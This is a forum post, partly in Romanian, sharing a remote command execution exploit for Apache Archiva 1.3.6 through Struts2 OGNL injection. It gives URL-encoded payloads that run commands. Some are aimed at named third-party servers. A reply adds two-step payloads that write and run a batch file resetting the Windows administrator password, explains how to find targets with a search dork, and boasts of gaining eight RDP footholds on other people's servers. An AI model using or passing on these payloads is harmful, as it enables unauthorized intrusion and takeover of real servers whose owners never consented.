Jump to content
Maximus

Apache Archiva 1.3.6 => Remote Command Execution 0day

Recommended Posts

Posted
Apache Archiva 1.3.6 => Remote Command Execution

####################################################################

Author: Kacper

Contact: info[at]devilteam.pl

Home Page: https://devilteam.pl/

####################################################################

Vendor: Archiva - The Build Artifact Repository Manager

Dork: "Apache Archiva \ Browse Repository"

Description:

Apache Archiva use Apache Struts2:

"In Struts 2 before 2.3.15.1 the information following "action:", "redirect:" or "redirectAction:" is not properly sanitized. Since said information will be evaluated as OGNL expression against the value stack, this introduces the possibility to inject server side code."

In Apache Archiva can be use parameter redirect: for OGNL injection.

PoC:

(print devilteam.pl) http://imageshack.com/a/img163/6865/e88n.png

http://127.0.0.1:8080/archiva/security/login.action?redirect:${%23w%3d%23context.get%28%27

com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29.getWriter%28%29,%23w.println

%28%27devilteam.pl%27%29,%23w.flush%28%29,%23w.close%28%29}

{execute netstat) http://imageshack.com/a/img843/1662/0r84.png

http://127.0.0.1:8080/archiva/security/login.action?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder

%28new%20java.lang.String[]{%27netstat%27}%29%29.start%28%29,%23b%3d%23a.

getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,

%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],

%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2

.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,

%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29}

Demo:

http://archiva.eionet.eurXpa.eu/security/login.action?redirect:${%23w%3d%23context.get

%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29.getWriter

%28%29,%23w.println%28%27devilteam.pl%27%29,%23w.flush%28%29,%23w.close%28%29}

http://community.ucs.indiXna.edu:9090/archiva/security/login.action?redirect:${%23w%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29.getWriter%28%29,%23w.

println%28%27devilteam.pl%27%29,%23w.flush%28%29,%23w.close%28%29}

Cheers:

cxsecurity.com

Bartek (ZUOO)

and all people from devilteam.pl

Reference:

S2-016

https://devilteam.pl/viewtopic.php?p=43506

Daca tot am postat asta, uite ce-am incercat pana acum si-a mers

pas 1

/archiva/security/login.action?redirect:${%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{'cmd','/C','echo','net','user','administrator','rstcenter!','>_.bat'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b),%23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}

pas 2

/archiva/security/login.action?redirect:${%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{'cmd','/C','_.bat'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b),%23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}

inca nu am automatizat procesul dar se face asa ;

se cauta pe google "Apache Archiva login page"

ex. link vuln. : Apache Archiva \ Login Page

se adauga in ordine pasu 1 si pasu 2 de mai sus

ex :

pas1

http://maven.5amsolutions.com/archiva/security/login.action?redirect:${%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{'cmd','/C','echo','net','user','administrator','rstcenter!','>_.bat'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b),%23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}

pas2

http://maven.5amsolutions.com/archiva/security/login.action?redirect:${%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{'cmd','/C','_.bat'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b),%23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}

explicatie: (pas1) se creaza fisierul _.bat care contine "net user administrator rstcenter!" in serverul care hosteaza apache archiva ; pas2 se executa fisierul _.bat

la ora 12:00 (nu chiar 00) am descoperit exploitu ; la 2:56 am deja 8 RDP-uri (bunute) :D spor

P.S. va trebui sa va chinuiti putin, nu o ia din prima ; nu stiu de ce....

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...